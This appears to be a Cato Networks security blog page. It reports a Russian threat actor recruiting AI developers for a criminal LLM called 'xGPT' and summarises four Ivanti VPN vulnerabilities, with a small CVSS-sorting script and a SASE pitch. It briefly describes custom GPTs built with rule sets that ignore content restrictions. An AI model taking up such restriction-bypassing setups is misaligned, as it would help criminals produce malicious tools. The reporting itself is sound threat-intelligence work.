Cato Networks is proud to be the official SASE partner of the TAG Heuer Porsche Formula E Team. Learn more about this exciting partnership here: https://www.catonetworks.com/porsche-formula-e-team/


WANTED: Brilliant AI Experts Needed for Cyber Criminal Ring

In a recent ad on a closed Telegram channel, a known threat actor has announced it’s recruiting AI and ML experts for the development of its own LLM product.

Threat actors and cybercriminals have always been early adopters of new technology: from cryptocurrencies to anonymization tools to using the Internet itself. While cybercriminals were initially very excited about the prospect of using LLMs (Large Language Models) to support and enhance their operations, reality set in very quickly: these systems have a lot of problems and are not a “know it all, solve it all” solution. This was covered in one of our previous blogs, where we reported on a discussion of this topic in a Russian underground forum, whose conclusion was that LLMs are years away from being practically used for attacks.

The media has been reporting in recent months on different ChatGPT-like tools that threat actors have developed and that are being used by attackers, but once again, the reality was quite different. One such example is the wide reporting about WormGPT, a tool that was described as a malicious AI tool that can be used for anything from disinformation to actual attacks. Buyers of this tool were not impressed with it, seeing that it was just a ChatGPT bot with the same restrictions and hallucinations they were familiar with. Feedback about this tool soon followed:


With an urge to utilize AI, a known Russian threat actor has now advertised a recruitment message in a closed Telegram channel, looking for a developer to develop their own AI tool, dubbed xGPT. Why is this significant? First, this is a known threat actor that has already sold credentials and access to US government entities, banks, mobile networks, and other victims. Second, it looks like they are not trying to just connect to an existing LLM but rather develop a solution of their own. In this ad, the threat actor explicitly details they are looking to “push the boundaries of what’s possible in our field” and are looking for individuals who “have a strong background in machine learning, artificial intelligence, or related fields.”

Developing, training, and deploying an LLM is not a small task. How can threat actors hope to perform this task, when enterprises need years to develop and deploy these products? The answer may lie in the recently announced GPTs, the customized ChatGPT agent product announced by OpenAI. Threat actors may create ChatGPT instances (and offer them for sale) that differ from ChatGPT in multiple ways. These differences may include a customized rule set that ignores the restrictions imposed by OpenAI on creating malicious content. Another difference may be a customized knowledge base that may include the data needed to develop malicious tools, evade detection, and more. In a recent blog, Cato Networks threat intelligence researcher Vitaly Simonovich explored the introduction and the possible ways of hacking GPTs.

It remains to be seen how this new product will be developed and sold, as well as how well it performs when compared to the disappointing (from the cybercriminals' perspective) introduction of WormGPT and the like. However, we should keep in mind that this threat actor is not one to be dismissed or overlooked.




When Patch Tuesday becomes Patch Monday – Friday

If you’re an administrator running Ivanti VPN (Connect Secure and Policy Secure) appliances in your network, then the past two months have likely made you wish you weren't. In a relatively short timeframe, bad news kept piling up for Ivanti Connect Secure VPN customers, starting on Jan. 10th, 2024, when critical and high severity vulnerabilities, CVE-2024-21887 and CVE-2023-46805 respectively, were disclosed by Ivanti, impacting all supported versions of the product. The chaining of these vulnerabilities, a command injection weakness and an authentication bypass, could result in remote code execution on the appliance without any authentication. This enables complete device takeover and opens the door for attackers to move laterally within the network.

This was followed three weeks later, on Jan. 31st, 2024, by two more high severity vulnerabilities, CVE-2024-21888 and CVE-2024-21893, prompting CISA to supersede its previous directive to patch the two initial CVEs by ordering all U.S. Federal agencies to disconnect all Ivanti appliances from the network “as soon as possible” and no later than 11:59 PM on February 2nd.

As patches were gradually made available by Ivanti, the recommendation by CISA and Ivanti themselves has been to not only patch impacted appliances but to first factory reset them and then apply the patches, to prevent attackers from maintaining persistence across upgrades. It goes without saying that the downtime and amount of work required from security teams to maintain the business’ remote access are, putting it mildly, substantial.





In today’s “work from anywhere” market, businesses cannot afford downtime of this magnitude; the loss of employee productivity that occurs when remote access is down has a direct impact on the bottom line.

Security teams and CISOs running Ivanti and similar on-prem VPN solutions need to accept that this security architecture is fast becoming, if not already, obsolete and should remain a thing of the past. Migrating to a modern ZTNA deployment, preferably as part of a single-vendor SASE solution, has countless benefits. Not only does it immensely increase the security within the network, stopping lateral movement and limiting the “blast radius” of an attack, but it also serves to alleviate the burden of patching, monitoring and maintaining the bottomless pit of geographically distributed physical appliances from multiple vendors.


Details of the vulnerabilities

CVE-2023-46805: Authentication Bypass (CVSS 8.2)

Found in the web component of Ivanti Connect Secure and Ivanti Policy Secure (versions 9.x and 22.x).

Allows remote attackers to access restricted resources by bypassing control checks.

CVE-2024-21887: Command Injection (CVSS 9.1)

Identified in the web components of Ivanti Connect Secure and Ivanti Policy Secure (versions 9.x and 22.x).

Enables authenticated administrators to execute arbitrary commands via specially crafted requests.

CVE-2024-21888: Privilege Escalation (CVSS 8.8)

Discovered in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x).

Permits users to elevate privileges to that of an administrator.

CVE-2024-21893: Server-Side Request Forgery (SSRF) (CVSS 8.2)

Present in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x), and Ivanti Neurons for ZTA.

Allows attackers to access restricted resources without authentication.
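For teams tracking these issues in their own tooling, the four CVEs can be captured as a small data structure and ordered by score. The Python sketch below uses the CVSS values listed above and the standard CVSS v3.x qualitative bands (7.0 to 8.9 is High, 9.0 and above is Critical). The `Vulnerability` class and the `severity` helper are illustrative names, not part of any Ivanti or Cato tooling.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Vulnerability:
    cve_id: str
    weakness: str
    cvss: float


def severity(score: float) -> str:
    """Map a CVSS v3.x base score to its qualitative severity rating."""
    if score >= 9.0:
        return "Critical"
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    if score > 0.0:
        return "Low"
    return "None"


# Scores as listed in the vulnerability details above.
IVANTI_CVES = [
    Vulnerability("CVE-2023-46805", "Authentication Bypass", 8.2),
    Vulnerability("CVE-2024-21887", "Command Injection", 9.1),
    Vulnerability("CVE-2024-21888", "Privilege Escalation", 8.8),
    Vulnerability("CVE-2024-21893", "Server-Side Request Forgery", 8.2),
]

# Highest score first, as a simple patching priority order.
by_priority = sorted(IVANTI_CVES, key=lambda v: v.cvss, reverse=True)

for vuln in by_priority:
    print(f"{vuln.cve_id}  {vuln.cvss:>4}  {severity(vuln.cvss):<8}  {vuln.weakness}")
```

Score alone understates the risk here: CVE-2023-46805 and CVE-2024-21887 are more dangerous chained together than either score suggests, so real prioritization should also account for known exploit chains.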